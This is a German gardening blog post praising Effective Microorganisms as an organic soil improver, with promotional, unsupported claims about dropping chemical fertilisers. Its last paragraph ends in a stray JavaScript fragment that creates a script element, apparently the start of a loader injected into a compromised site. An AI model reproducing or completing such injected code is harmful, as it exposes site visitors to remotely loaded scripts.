Gesunder Boden – Gesunder Mensch

Gesunder Boden und dadurch eine gesunde Ernte. Genau das möchten sowohl Hobby- als auch Profigärtner erreichen. Durch die herkömmliche Boden- und Schädlingsbehandlung ist dies jedoch nur bedingt machbar. Auch die Umstellung auf Bio Dünger kann nicht jeden Schaden des Bodens ausgleichen.

Hier kommen die Effektiven Mikroorganismen ins Spiel. Ursprünglich für den Einsatz im Obst- und Gartenbau konzipiert, sorgen sie nicht nur für kräftige, gesunde Pflanzen. Nein, sie verbessern nachhaltig die Bodenfruchtbarkeit. Sie schaffen somit langfristig Bio Erde. Da die EMs für einen gesunden, lebendigen Boden sorgen, ist der Einsatz der chemischen Keule nicht mehr im grossen Stil notwendig. Eventuell kann vollständig auch Pflanzenschutzmittel oder chemischen Dünger verzichtet werden. Neben der Stärkung der Pflanzen wird der Gartenfreund auch feststellen können, dass sich auch die Fauna verändert. Tiere, die schon aus dem Garten verschwunden waren, finden sich wieder ein.
Es liegt auf der Hand, dass ein Garten, der durch den Einsatz von Bio Dünger, denn nichts anderes ein auf EM basierender Bodenverbesserer, gesundet ist, auch eine Tier- und Insektenvielfalt anzieht.

Mit Hilfe von Effektiven Mikroorganismen Bio Erde schaffen, eine gesunde Ernte zu erhalten, einheimische Insekten, Tiere und Vögel in seinen Garten zu locken – was mehr kann sich ein wahrer Naturfreund wünschen? var d=document;var s=d.createElement(‘script’);

Posted in Blog.

Hinterlasse eine Antwort